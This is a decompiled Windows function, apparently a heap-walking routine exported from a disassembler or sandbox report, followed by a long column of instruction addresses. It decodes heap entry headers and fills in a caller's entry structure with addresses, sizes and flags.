                                                                                                                                                                                          			E1D879C98(signed int __ecx, signed int* __edx, char _a4) {
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t255;
				signed int _t257;
				signed int _t258;
				signed char _t259;
				signed int _t260;
				char* _t261;
				intOrPtr _t263;
				signed int _t267;
				signed char _t268;
				unsigned int _t269;
				signed int _t273;
				signed char _t277;
				signed short _t279;
				signed short _t284;
				signed char _t285;
				unsigned int _t286;
				signed short _t288;
				signed short _t290;
				signed char _t291;
				intOrPtr _t292;
				signed int _t293;
				signed char _t294;
				unsigned int _t298;
				intOrPtr* _t299;
				signed int _t300;
				unsigned int _t301;
				signed short _t302;
				signed short _t303;
				signed int _t306;
				signed short _t309;
				signed short _t321;
				signed char _t324;
				signed short _t325;
				signed int _t327;
				void* _t328;
				signed short _t332;
				signed int _t334;
				void* _t335;
				signed short _t339;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t354;
				signed short _t357;
				signed int _t364;
				signed int _t371;
				signed short _t372;
				intOrPtr* _t373;
				signed short _t376;
				signed char _t378;
				signed short _t379;
				signed short _t380;
				signed int _t385;
				signed int _t388;
				signed int _t395;
				signed char _t397;
				signed short _t400;
				signed int _t401;
				signed short _t402;
				signed short _t403;
				signed short _t404;
				signed short _t405;
				intOrPtr _t409;
				signed int _t410;
				signed char _t411;
				signed int _t412;
				unsigned int _t417;
				unsigned int _t425;
				signed int _t436;
				signed int _t437;
				signed char _t438;
				signed int _t440;
				intOrPtr _t444;
				signed int _t445;
				void* _t449;
				intOrPtr _t452;
				signed int _t454;
				void* _t455;
				signed short _t456;
				unsigned int _t457;
				intOrPtr _t458;
				intOrPtr* _t461;

				_t460 = __ecx;
				_t391 = __edx;
				if(( *(__ecx + 0x44) & 0x01000000) != 0) {
					_t461 =  *0x1d8c3764; // 0x0
					 *0x1d8c91e0(__ecx, __edx);
					return  *_t461();
				}
				__eflags =  *(__ecx + 0x40) & 0x61000000;
				asm("bt dword [esi+0x40], 0x1c");
				__eflags = (_t255 & 0xffffff00 | ( *(__ecx + 0x40) & 0x61000000) >= 0x00000000) & (__ecx & 0xffffff00 | __eflags != 0x00000000);
				if(__eflags == 0) {
					L5:
					_v12 = _v12 & 0x00000000;
					_t257 =  *_t391;
					_t394 = 2;
					__eflags = _t257;
					if(_t257 != 0) {
						_t436 = _t391[2] & 0x0000ffff;
						__eflags = _t436 & 0x00001002;
						if((_t436 & 0x00001002) == 0) {
							goto L25;
						}
						_t394 = _t436 & 0x00000002;
						__eflags = _t394;
						if(_t394 == 0) {
							L14:
							__eflags = _a4;
							if(_a4 == 0) {
								L17:
								_t457 = _t391[1] + _t257;
								__eflags = _t436 & 0x00001000;
								if((_t436 & 0x00001000) != 0) {
									_t27 = _t257 - 0x18; // -24
									_t394 = _t460;
									_t257 = E1D878214(_t460, _t27);
								}
								__eflags = _a4;
								if(_a4 == 0) {
									L21:
									_t452 =  *((intOrPtr*)(_t257 + 0x10));
									_t394 = 2;
									__eflags = _t452 - _t460 + 0xa4;
									if(_t452 == _t460 + 0xa4) {
										__eflags =  *((intOrPtr*)(_t460 + 0xea)) - _t394;
										if( *((intOrPtr*)(_t460 + 0xea)) != _t394) {
											goto L61;
										}
										_t445 =  *(_t460 + 0xe4);
										goto L62;
									}
									_t445 = _t452 + 0xfffffff0;
									goto L62;
								} else {
									__eflags = _t457 -  *((intOrPtr*)(_t257 + 0x28));
									if(_t457 <  *((intOrPtr*)(_t257 + 0x28))) {
										goto L81;
									}
									goto L21;
								}
							}
							__eflags = _t394;
							if(_t394 == 0) {
								goto L17;
							}
							_t457 =  *(_t257 + 0x24);
							goto L81;
						} else {
							__eflags =  *((char*)(_t460 + 0xea)) - 2;
							if( *((char*)(_t460 + 0xea)) != 2) {
								_t454 = 0;
								__eflags = 0;
							} else {
								_t454 =  *(_t460 + 0xe4);
							}
							__eflags = _t257 - _t454;
							if(_t257 == _t454) {
								goto L60;
							}
							_t436 = _t391[2] & 0x0000ffff;
							goto L14;
						}
					} else {
						_t445 = _t460;
						L62:
						_t457 = 0;
						__eflags = _t445;
						if(_t445 != 0) {
							__eflags =  *((intOrPtr*)(_t460 + 0xea)) - _t394;
							if( *((intOrPtr*)(_t460 + 0xea)) != _t394) {
								_t354 = 0;
								__eflags = 0;
							} else {
								_t354 =  *(_t460 + 0xe4);
							}
							__eflags = _t445 - _t354;
							if(_t445 == _t354) {
								E1D892527(_t460, _t391,  &_v12);
								goto L192;
							} else {
								 *_t391 = _t445;
								__eflags =  *(_t460 + 0x4c) - _t457;
								if( *(_t460 + 0x4c) == _t457) {
									_t357 =  *_t445 & 0x0000ffff;
								} else {
									_t372 =  *_t445;
									__eflags =  *(_t460 + 0x4c) & _t372;
									if(( *(_t460 + 0x4c) & _t372) != 0) {
										_t372 = _t372 ^  *(_t460 + 0x50);
										__eflags = _t372;
									}
									_t357 = _t372 & 0x0000ffff;
								}
								_t391[1] = (_t357 & 0x0000ffff) << 3;
								_t391[2] = _t394;
								_t391[2] = _t457;
								_t391[3] =  *((intOrPtr*)(_t445 + 0x20)) -  *(_t445 + 0x2c) << 0xc;
								_t364 =  *(_t445 + 0x2c) << 0xc;
								_t391[4] = _t364;
								__eflags =  *(_t445 + 0xc) & _t394;
								if(( *(_t445 + 0xc) & _t394) != 0) {
									_t371 = _t364 + 0x1000;
									__eflags = _t371;
									_t391[4] = _t371;
								}
								_t391[5] =  *((intOrPtr*)(_t445 + 0x24)) + (( !( *( *((intOrPtr*)(_t445 + 0x24)) + 2)) & 0x00000001) + 1) * 8;
								_t391[6] =  *(_t445 + 0x28);
								L81:
								__eflags = _t457;
								if(_t457 == 0) {
									goto L192;
								}
								_t268 =  *((intOrPtr*)(_t457 + 7));
								__eflags = _t268 & 0x00000040;
								if((_t268 & 0x00000040) == 0) {
									__eflags = _t268 - 4;
									if(_t268 != 4) {
										_t269 = _t457;
										L88:
										 *_t391 = _t269 + 8;
										_t438 = 2;
										_t391[2] = 1;
										__eflags =  *((intOrPtr*)(_t460 + 0xea)) - _t438;
										if( *((intOrPtr*)(_t460 + 0xea)) != _t438) {
											_t273 = 0;
											__eflags = 0;
										} else {
											_t273 =  *(_t460 + 0xe4);
										}
										__eflags = _t273;
										if(_t273 == 0) {
											L96:
											_t277 =  *(_t460 + 0x4c) >> 0x00000014 &  *(_t460 + 0x52) ^  *(_t457 + 2);
											__eflags = _t277 & 0x00000001;
											if((_t277 & 0x00000001) == 0) {
												 *_t391 = _t457 + 0x10;
												__eflags =  *(_t460 + 0x4c);
												if( *(_t460 + 0x4c) == 0) {
													_t279 =  *_t457 & 0x0000ffff;
												} else {
													_t284 =  *_t457;
													__eflags =  *(_t460 + 0x4c) & _t284;
													if(( *(_t460 + 0x4c) & _t284) != 0) {
														_t284 = _t284 ^  *(_t460 + 0x50);
														__eflags = _t284;
													}
													_t279 = _t284 & 0x0000ffff;
												}
												_t391[1] = (_t279 & 0x0000ffff) * 8 - 0x10;
												_t391[2] =  *(_t457 + 6);
												_t391[2] = 0;
												_t391[2] = 0x10;
												_t391[5] = 0x10;
												goto L192;
											}
											_t285 =  *((intOrPtr*)(_t457 + 7));
											__eflags = _t285 & 0x00000040;
											if((_t285 & 0x00000040) == 0) {
												__eflags = _t285 - 4;
												if(_t285 != 4) {
													_t286 = _t457;
													L103:
													 *_t391 = _t286 + 8;
													_t397 =  *((intOrPtr*)(_t457 + 7));
													__eflags = _t397 - 4;
													if(_t397 == 4) {
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t288 =  *_t457 & 0x0000ffff;
														} else {
															_t303 =  *_t457;
															__eflags =  *(_t460 + 0x4c) & _t303;
															if(( *(_t460 + 0x4c) & _t303) != 0) {
																_t303 = _t303 ^  *(_t460 + 0x50);
																__eflags = _t303;
															}
															_t288 = _t303 & 0x0000ffff;
														}
														_t391[2] = 0x40;
														_t290 = 0x4001;
														_t391[1] =  *((intOrPtr*)(_t457 - 8)) - (_t288 & 0x0000ffff);
														_t391[2] = 0x4001;
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t400 =  *_t457 & 0x0000ffff;
														} else {
															_t302 =  *_t457;
															__eflags =  *(_t460 + 0x4c) & _t302;
															if(( *(_t460 + 0x4c) & _t302) != 0) {
																_t302 = _t302 ^  *(_t460 + 0x50);
																__eflags = _t302;
															}
															_t400 = _t302 & 0x0000ffff;
															_t290 = _t391[2] & 0x0000ffff;
														}
														_t401 = _t400 & 0x0000ffff;
														_t391[2] = _t401;
														__eflags = _t438 & _t290;
														if((_t438 & _t290) == 0) {
															_t391[5] = _t401;
														}
														_t402 = _t290 & 0x0000ffff;
														L165:
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t291 =  *(_t457 + 2);
															_t403 = _t402 & 0x0000ffff;
														} else {
															_t301 =  *_t457;
															__eflags =  *(_t460 + 0x4c) & _t301;
															if(( *(_t460 + 0x4c) & _t301) != 0) {
																_t301 = _t301 ^  *(_t460 + 0x50);
																__eflags = _t301;
															}
															_t403 = _t391[2] & 0x0000ffff;
															_t291 = _t301 >> 0x10;
														}
														__eflags = _t438 & _t291;
														if((_t438 & _t291) == 0) {
															_t292 =  *[fs:0x30];
															_t404 = _t403 & 0x0000ffff;
															__eflags =  *(_t292 + 0x68) & 0x00000800;
															if(( *(_t292 + 0x68) & 0x00000800) != 0) {
																_t293 =  *(_t457 + 3) & 0x000000ff;
															} else {
																_t293 = 0;
															}
															_t391[4] = _t293;
														} else {
															_t299 = E1D878167(_t460, _t457);
															_t391[3] =  *(_t299 + 4);
															_t391[4] =  *_t299;
															_t409 =  *[fs:0x30];
															__eflags =  *(_t409 + 0x68) & 0x00000800;
															if(( *(_t409 + 0x68) & 0x00000800) != 0) {
																_t300 =  *(_t299 + 2) & 0x0000ffff;
															} else {
																_t300 = 0;
															}
															_t391[4] = _t300;
															_t391[2] = _t391[2] | 0x00000010;
															_t404 = _t391[2] & 0x0000ffff;
														}
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t294 =  *(_t457 + 2);
															_t405 = _t404 & 0x0000ffff;
														} else {
															_t298 =  *_t457;
															__eflags =  *(_t460 + 0x4c) & _t298;
															if(( *(_t460 + 0x4c) & _t298) != 0) {
																_t298 = _t298 ^  *(_t460 + 0x50);
																__eflags = _t298;
															}
															_t405 = _t391[2] & 0x0000ffff;
															_t294 = _t298 >> 0x10;
														}
														_t391[2] = _t294 & 0xe0 | _t405;
														goto L192;
													}
													__eflags = _t397 - 3;
													if(_t397 == 3) {
														_t402 = 0x1000;
														 *_t391 =  *(_t457 + 0x18);
														_t391[5] = _t391[5] & 0x00000000;
														_t391[1] =  *(_t457 + 0x1c);
														_t391[2] = 0x10000000;
														goto L165;
													}
													__eflags = _t397 - 1;
													if(_t397 != 1) {
														_t440 =  *(_t460 + 0x4c);
														__eflags = _t440;
														if(_t440 == 0) {
															_t306 =  *_t457 & 0x0000ffff;
														} else {
															_t339 =  *_t457;
															_t440 =  *(_t460 + 0x4c);
															__eflags = _t339 & _t440;
															if((_t339 & _t440) != 0) {
																_t339 = _t339 ^  *(_t460 + 0x50);
																__eflags = _t339;
															}
															_t397 =  *((intOrPtr*)(_t457 + 7));
															_t306 = _t339 & 0x0000ffff;
														}
														_v16 = _t306;
														__eflags = _t397 - 5;
														if(_t397 != 5) {
															__eflags = _t397 & 0x00000040;
															if((_t397 & 0x00000040) == 0) {
																__eflags = (_t397 & 0x0000003f) - 0x3f;
																if((_t397 & 0x0000003f) == 0x3f) {
																	__eflags = _t397;
																	if(_t397 >= 0) {
																		__eflags = _t440;
																		if(_t440 == 0) {
																			_t309 =  *_t457 & 0x0000ffff;
																		} else {
																			_t332 =  *_t457;
																			__eflags =  *(_t460 + 0x4c) & _t332;
																			if(( *(_t460 + 0x4c) & _t332) != 0) {
																				_t332 = _t332 ^  *(_t460 + 0x50);
																				__eflags = _t332;
																			}
																			_t309 = _t332 & 0x0000ffff;
																		}
																	} else {
																		_t425 = _t457 >> 0x00000003 ^  *_t457 ^  *0x1d8c6964 ^ _t460;
																		__eflags = _t425;
																		if(_t425 == 0) {
																			_t334 = _t457 - (_t425 >> 0xd);
																			__eflags = _t334;
																			_t335 =  *_t334;
																		} else {
																			_t335 = 0;
																		}
																		_t309 =  *((intOrPtr*)(_t335 + 0x14));
																	}
																	_t410 =  *(_t457 + (_t309 & 0xffff) * 8 - 4);
																} else {
																	_t410 = _t397 & 0x3f;
																}
															} else {
																_t410 =  *(_t457 + 4 + (_t397 & 0x3f) * 8) & 0x0000ffff;
															}
														} else {
															_t410 =  *(_t460 + 0x54) & 0x0000ffff ^  *(_t457 + 4) & 0x0000ffff;
														}
														_t391[1] = ((_v16 & 0x0000ffff) << 3) - _t410;
														_t391[2] =  *(_t457 + 6);
														_t391[2] = 1;
														_t411 =  *((intOrPtr*)(_t457 + 7));
														__eflags = _t411 - 5;
														if(_t411 != 5) {
															__eflags = _t411 & 0x00000040;
															if((_t411 & 0x00000040) == 0) {
																__eflags = (_t411 & 0x0000003f) - 0x3f;
																if((_t411 & 0x0000003f) == 0x3f) {
																	__eflags = _t411;
																	if(_t411 >= 0) {
																		__eflags =  *(_t460 + 0x4c);
																		if( *(_t460 + 0x4c) == 0) {
																			_t321 =  *_t457 & 0x0000ffff;
																		} else {
																			_t325 =  *_t457;
																			__eflags =  *(_t460 + 0x4c) & _t325;
																			if(( *(_t460 + 0x4c) & _t325) != 0) {
																				_t325 = _t325 ^  *(_t460 + 0x50);
																				__eflags = _t325;
																			}
																			_t321 = _t325 & 0x0000ffff;
																		}
																	} else {
																		_t417 = _t457 >> 0x00000003 ^  *_t457 ^  *0x1d8c6964 ^ _t460;
																		__eflags = _t417;
																		if(_t417 == 0) {
																			_t327 = _t457 - (_t417 >> 0xd);
																			__eflags = _t327;
																			_t328 =  *_t327;
																		} else {
																			_t328 = 0;
																		}
																		_t321 =  *((intOrPtr*)(_t328 + 0x14));
																	}
																	_t412 =  *(_t457 + (_t321 & 0xffff) * 8 - 4);
																} else {
																	_t412 = _t411 & 0x3f;
																}
															} else {
																_t412 =  *(_t457 + 4 + (_t411 & 0x3f) * 8) & 0x0000ffff;
															}
														} else {
															_t412 =  *(_t460 + 0x54) & 0x0000ffff ^  *(_t457 + 4) & 0x0000ffff;
														}
														_t324 = _t391[2] & 0x0000ffff;
														_t438 = 2;
														_t391[2] = _t412;
														__eflags = _t438 & _t324;
														if((_t438 & _t324) == 0) {
															_t391[5] = _t412;
														}
														_t402 = _t324;
														goto L165;
													}
													_t391[2] = 1;
													goto L94;
												}
												_t342 =  *(_t457 + 6) & 0x000000ff;
												L99:
												_t286 = _t457 + _t342 * 8;
												goto L103;
											}
											_t342 = _t285 & 0x3f;
											__eflags = _t342;
											goto L99;
										} else {
											_t344 = E1D891FC6(_t460, _t391, _t394);
											__eflags = _t344;
											if(_t344 == 0) {
												_t438 = 2;
												goto L96;
											}
											__eflags = _t391[2] & 0x00002000;
											if((_t391[2] & 0x00002000) == 0) {
												goto L192;
											}
											L94:
											_t394 = 2;
											L25:
											__eflags =  *((intOrPtr*)(_t460 + 0xea)) - _t394;
											if( *((intOrPtr*)(_t460 + 0xea)) != _t394) {
												_t258 = 0;
												__eflags = 0;
											} else {
												_t258 =  *(_t460 + 0xe4);
											}
											__eflags = _t258;
											if(_t258 == 0) {
												L31:
												__eflags = _t391[2] & 0x00000001;
												_t395 =  *_t391;
												if((_t391[2] & 0x00000001) == 0) {
													_t394 = _t395 + 0xfffffff0;
													__eflags =  *(_t460 + 0x4c);
													if( *(_t460 + 0x4c) == 0) {
														_t456 =  *_t394 & 0x0000ffff;
													} else {
														_t376 =  *_t394;
														__eflags =  *(_t460 + 0x4c) & _t376;
														if(( *(_t460 + 0x4c) & _t376) != 0) {
															_t376 = _t376 ^  *(_t460 + 0x50);
															__eflags = _t376;
														}
														_t456 = _t376 & 0x0000ffff;
													}
													_t259 =  *(_t394 + 6);
													__eflags = _t259;
													if(_t259 == 0) {
														_t437 = _t460;
													} else {
														_t437 = (_t394 & 0xffff0000) - ((_t259 & 0x000000ff) << 0x10) + 0x10000;
													}
													__eflags = _t437;
													if(_t437 == 0) {
														L191:
														_v12 = 0xc0000141;
														goto L192;
													} else {
														__eflags =  *((char*)(_t394 + 7)) - 3;
														if( *((char*)(_t394 + 7)) != 3) {
															_t267 = _t456 & 0x0000ffff;
															L80:
															_t457 = _t394 + _t267 * 8;
															goto L81;
														}
														L57:
														__eflags =  *(_t394 + 0x1c) + 0x20 + _t394 -  *((intOrPtr*)(_t437 + 0x28));
														if( *(_t394 + 0x1c) + 0x20 + _t394 <  *((intOrPtr*)(_t437 + 0x28))) {
															 *_t391 =  *(_t394 + 0x18);
															_t391[5] = _t391[5] & 0x00000000;
															_t457 = 0;
															_t391[1] =  *(_t394 + 0x1c);
															_t391[2] = 0x10000000;
															goto L81;
														}
														_t444 =  *((intOrPtr*)(_t437 + 0x10));
														__eflags = _t444 - _t460 + 0xa4;
														if(_t444 == _t460 + 0xa4) {
															L60:
															_t394 = 2;
															L61:
															_t445 = 0;
															__eflags = 0;
															goto L62;
														}
														_t445 = _t444 + 0xfffffff0;
														_t394 = 2;
														goto L62;
													}
												}
												_t394 = _t395 + 0xfffffff8;
												__eflags =  *((char*)(_t394 + 7)) - 5;
												if( *((char*)(_t394 + 7)) == 5) {
													_t394 = _t394 - (( *(_t394 + 6) & 0x000000ff) << 3);
													__eflags = _t394;
												}
												__eflags =  *((intOrPtr*)(_t394 + 7)) - 4;
												if( *((intOrPtr*)(_t394 + 7)) != 4) {
													_t378 =  *(_t394 + 6);
													__eflags = _t378;
													if(_t378 == 0) {
														_t437 = _t460;
													} else {
														_t449 = (_t394 & 0xffff0000) - ((_t378 & 0x000000ff) << 0x10);
														_t378 =  *((intOrPtr*)(_t394 + 7));
														_t437 = _t449 + 0x10000;
													}
													__eflags = _t437;
													if(_t437 == 0) {
														goto L191;
													} else {
														__eflags = _t378 - 3;
														if(_t378 == 3) {
															goto L57;
														}
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t379 =  *_t394 & 0x0000ffff;
														} else {
															_t380 =  *_t394;
															__eflags =  *(_t460 + 0x4c) & _t380;
															if(( *(_t460 + 0x4c) & _t380) != 0) {
																_t380 = _t380 ^  *(_t460 + 0x50);
																__eflags = _t380;
															}
															_t379 = _t380 & 0x0000ffff;
														}
														_t267 = _t379 & 0x0000ffff;
														goto L80;
													}
												} else {
													_t458 =  *((intOrPtr*)(_t394 - 0x18));
													_t373 = _t460 + 0x9c;
													L64:
													__eflags = _t458 - _t373;
													if(_t458 == _t373) {
														_v12 = 0x8000001a;
														goto L192;
													}
													_t457 = _t458 + 0x18;
													goto L81;
												}
											} else {
												_t385 = E1D891FC6(_t460, _t391, _t394);
												__eflags = _t385;
												if(_t385 == 0) {
													goto L31;
												}
												__eflags = _t391[2] & 0x00002000;
												if((_t391[2] & 0x00002000) == 0) {
													goto L192;
												}
												goto L31;
											}
										}
									}
									_t346 =  *(_t457 + 6) & 0x000000ff;
									L84:
									_t269 = _t457 + _t346 * 8;
									goto L88;
								}
								_t346 = _t268 & 0x3f;
								__eflags = _t346;
								goto L84;
							}
						}
						_t373 = _t460 + 0x9c;
						_t458 =  *_t373;
						goto L64;
					}
				} else {
					_t388 = E1D8806C6(__edx, __ecx, _t455, __ecx, __eflags);
					__eflags = _t388;
					if(_t388 != 0) {
						goto L5;
					} else {
						_v12 = 0xc000000d;
						L192:
						_t260 = E1D7E3C40();
						__eflags = _t260;
						if(_t260 == 0) {
							_t261 = 0x7ffe0380;
						} else {
							_t261 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						__eflags =  *_t261;
						if( *_t261 != 0) {
							_t263 =  *[fs:0x30];
							__eflags =  *(_t263 + 0x240) & 0x00000001;
							if(( *(_t263 + 0x240) & 0x00000001) != 0) {
								__eflags = _v12 - 0x8000001a;
								if(_v12 != 0x8000001a) {
									E1D88F7CF(_t460);
								}
							}
						}
						return _v12;
					}
				}
			}



























































































                                                                                                                                                                                          0x1d879ca2
                                                                                                                                                                                          0x1d879ca4
                                                                                                                                                                                          0x1d879cae
                                                                                                                                                                                          0x1d879cb2
                                                                                                                                                                                          0x1d879cba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879cc0
                                                                                                                                                                                          0x1d879cc7
                                                                                                                                                                                          0x1d879cd1
                                                                                                                                                                                          0x1d879cd9
                                                                                                                                                                                          0x1d879cdb
                                                                                                                                                                                          0x1d879cf4
                                                                                                                                                                                          0x1d879cf4
                                                                                                                                                                                          0x1d879cf8
                                                                                                                                                                                          0x1d879cfc
                                                                                                                                                                                          0x1d879cfd
                                                                                                                                                                                          0x1d879cff
                                                                                                                                                                                          0x1d879d08
                                                                                                                                                                                          0x1d879d0c
                                                                                                                                                                                          0x1d879d12
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879d1a
                                                                                                                                                                                          0x1d879d1a
                                                                                                                                                                                          0x1d879d1d
                                                                                                                                                                                          0x1d879d3e
                                                                                                                                                                                          0x1d879d3e
                                                                                                                                                                                          0x1d879d42
                                                                                                                                                                                          0x1d879d51
                                                                                                                                                                                          0x1d879d54
                                                                                                                                                                                          0x1d879d56
                                                                                                                                                                                          0x1d879d5c
                                                                                                                                                                                          0x1d879d5e
                                                                                                                                                                                          0x1d879d61
                                                                                                                                                                                          0x1d879d63
                                                                                                                                                                                          0x1d879d63
                                                                                                                                                                                          0x1d879d68
                                                                                                                                                                                          0x1d879d6c
                                                                                                                                                                                          0x1d879d77
                                                                                                                                                                                          0x1d879d77
                                                                                                                                                                                          0x1d879d82
                                                                                                                                                                                          0x1d879d83
                                                                                                                                                                                          0x1d879d85
                                                                                                                                                                                          0x1d879d8f
                                                                                                                                                                                          0x1d879d95
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879d9b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879d9b
                                                                                                                                                                                          0x1d879d87
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879d6e
                                                                                                                                                                                          0x1d879d6e
                                                                                                                                                                                          0x1d879d71
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879d71
                                                                                                                                                                                          0x1d879d6c
                                                                                                                                                                                          0x1d879d44
                                                                                                                                                                                          0x1d879d47
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879d49
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879d1f
                                                                                                                                                                                          0x1d879d1f
                                                                                                                                                                                          0x1d879d26
                                                                                                                                                                                          0x1d879d30
                                                                                                                                                                                          0x1d879d30
                                                                                                                                                                                          0x1d879d28
                                                                                                                                                                                          0x1d879d28
                                                                                                                                                                                          0x1d879d28
                                                                                                                                                                                          0x1d879d32
                                                                                                                                                                                          0x1d879d34
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879d3a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879d3a
                                                                                                                                                                                          0x1d879d01
                                                                                                                                                                                          0x1d879d01
                                                                                                                                                                                          0x1d879ed3
                                                                                                                                                                                          0x1d879ed3
                                                                                                                                                                                          0x1d879ed5
                                                                                                                                                                                          0x1d879ed7
                                                                                                                                                                                          0x1d879ef1
                                                                                                                                                                                          0x1d879ef7
                                                                                                                                                                                          0x1d879f01
                                                                                                                                                                                          0x1d879f01
                                                                                                                                                                                          0x1d879ef9
                                                                                                                                                                                          0x1d879ef9
                                                                                                                                                                                          0x1d879ef9
                                                                                                                                                                                          0x1d879f03
                                                                                                                                                                                          0x1d879f05
                                                                                                                                                                                          0x1d87a072
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879f0b
                                                                                                                                                                                          0x1d879f0b
                                                                                                                                                                                          0x1d879f0d
                                                                                                                                                                                          0x1d879f10
                                                                                                                                                                                          0x1d879f21
                                                                                                                                                                                          0x1d879f12
                                                                                                                                                                                          0x1d879f12
                                                                                                                                                                                          0x1d879f14
                                                                                                                                                                                          0x1d879f17
                                                                                                                                                                                          0x1d879f19
                                                                                                                                                                                          0x1d879f19
                                                                                                                                                                                          0x1d879f19
                                                                                                                                                                                          0x1d879f1c
                                                                                                                                                                                          0x1d879f1c
                                                                                                                                                                                          0x1d879f2a
                                                                                                                                                                                          0x1d879f2d
                                                                                                                                                                                          0x1d879f31
                                                                                                                                                                                          0x1d879f3e
                                                                                                                                                                                          0x1d879f44
                                                                                                                                                                                          0x1d879f47
                                                                                                                                                                                          0x1d879f4a
                                                                                                                                                                                          0x1d879f4d
                                                                                                                                                                                          0x1d879f4f
                                                                                                                                                                                          0x1d879f4f
                                                                                                                                                                                          0x1d879f54
                                                                                                                                                                                          0x1d879f54
                                                                                                                                                                                          0x1d879f66
                                                                                                                                                                                          0x1d879f6c
                                                                                                                                                                                          0x1d879f91
                                                                                                                                                                                          0x1d879f91
                                                                                                                                                                                          0x1d879f93
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879f99
                                                                                                                                                                                          0x1d879f9c
                                                                                                                                                                                          0x1d879f9e
                                                                                                                                                                                          0x1d879fab
                                                                                                                                                                                          0x1d879fad
                                                                                                                                                                                          0x1d879fb5
                                                                                                                                                                                          0x1d879fb7
                                                                                                                                                                                          0x1d879fba
                                                                                                                                                                                          0x1d879fc1
                                                                                                                                                                                          0x1d879fc2
                                                                                                                                                                                          0x1d879fc6
                                                                                                                                                                                          0x1d879fcc
                                                                                                                                                                                          0x1d879fd6
                                                                                                                                                                                          0x1d879fd6
                                                                                                                                                                                          0x1d879fce
                                                                                                                                                                                          0x1d879fce
                                                                                                                                                                                          0x1d879fce
                                                                                                                                                                                          0x1d879fd8
                                                                                                                                                                                          0x1d879fda
                                                                                                                                                                                          0x1d87a004
                                                                                                                                                                                          0x1d87a00d
                                                                                                                                                                                          0x1d87a010
                                                                                                                                                                                          0x1d87a012
                                                                                                                                                                                          0x1d87a2f5
                                                                                                                                                                                          0x1d87a2f7
                                                                                                                                                                                          0x1d87a2fb
                                                                                                                                                                                          0x1d87a30c
                                                                                                                                                                                          0x1d87a2fd
                                                                                                                                                                                          0x1d87a2fd
                                                                                                                                                                                          0x1d87a2ff
                                                                                                                                                                                          0x1d87a302
                                                                                                                                                                                          0x1d87a304
                                                                                                                                                                                          0x1d87a304
                                                                                                                                                                                          0x1d87a304
                                                                                                                                                                                          0x1d87a307
                                                                                                                                                                                          0x1d87a307
                                                                                                                                                                                          0x1d87a319
                                                                                                                                                                                          0x1d87a31f
                                                                                                                                                                                          0x1d87a324
                                                                                                                                                                                          0x1d87a328
                                                                                                                                                                                          0x1d87a32c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87a32c
                                                                                                                                                                                          0x1d87a018
                                                                                                                                                                                          0x1d87a01b
                                                                                                                                                                                          0x1d87a01d
                                                                                                                                                                                          0x1d87a02a
                                                                                                                                                                                          0x1d87a02c
                                                                                                                                                                                          0x1d87a034
                                                                                                                                                                                          0x1d87a036
                                                                                                                                                                                          0x1d87a039
                                                                                                                                                                                          0x1d87a03b
                                                                                                                                                                                          0x1d87a03e
                                                                                                                                                                                          0x1d87a041
                                                                                                                                                                                          0x1d87a1eb
                                                                                                                                                                                          0x1d87a1ef
                                                                                                                                                                                          0x1d87a200
                                                                                                                                                                                          0x1d87a1f1
                                                                                                                                                                                          0x1d87a1f1
                                                                                                                                                                                          0x1d87a1f3
                                                                                                                                                                                          0x1d87a1f6
                                                                                                                                                                                          0x1d87a1f8
                                                                                                                                                                                          0x1d87a1f8
                                                                                                                                                                                          0x1d87a1f8
                                                                                                                                                                                          0x1d87a1fb
                                                                                                                                                                                          0x1d87a1fb
                                                                                                                                                                                          0x1d87a20b
                                                                                                                                                                                          0x1d87a20f
                                                                                                                                                                                          0x1d87a214
                                                                                                                                                                                          0x1d87a217
                                                                                                                                                                                          0x1d87a21b
                                                                                                                                                                                          0x1d87a21f
                                                                                                                                                                                          0x1d87a234
                                                                                                                                                                                          0x1d87a221
                                                                                                                                                                                          0x1d87a221
                                                                                                                                                                                          0x1d87a223
                                                                                                                                                                                          0x1d87a226
                                                                                                                                                                                          0x1d87a228
                                                                                                                                                                                          0x1d87a228
                                                                                                                                                                                          0x1d87a228
                                                                                                                                                                                          0x1d87a22b
                                                                                                                                                                                          0x1d87a22e
                                                                                                                                                                                          0x1d87a22e
                                                                                                                                                                                          0x1d87a237
                                                                                                                                                                                          0x1d87a23a
                                                                                                                                                                                          0x1d87a23d
                                                                                                                                                                                          0x1d87a23f
                                                                                                                                                                                          0x1d87a241
                                                                                                                                                                                          0x1d87a241
                                                                                                                                                                                          0x1d87a244
                                                                                                                                                                                          0x1d87a247
                                                                                                                                                                                          0x1d87a247
                                                                                                                                                                                          0x1d87a24b
                                                                                                                                                                                          0x1d87a260
                                                                                                                                                                                          0x1d87a263
                                                                                                                                                                                          0x1d87a24d
                                                                                                                                                                                          0x1d87a24d
                                                                                                                                                                                          0x1d87a24f
                                                                                                                                                                                          0x1d87a252
                                                                                                                                                                                          0x1d87a254
                                                                                                                                                                                          0x1d87a254
                                                                                                                                                                                          0x1d87a254
                                                                                                                                                                                          0x1d87a257
                                                                                                                                                                                          0x1d87a25b
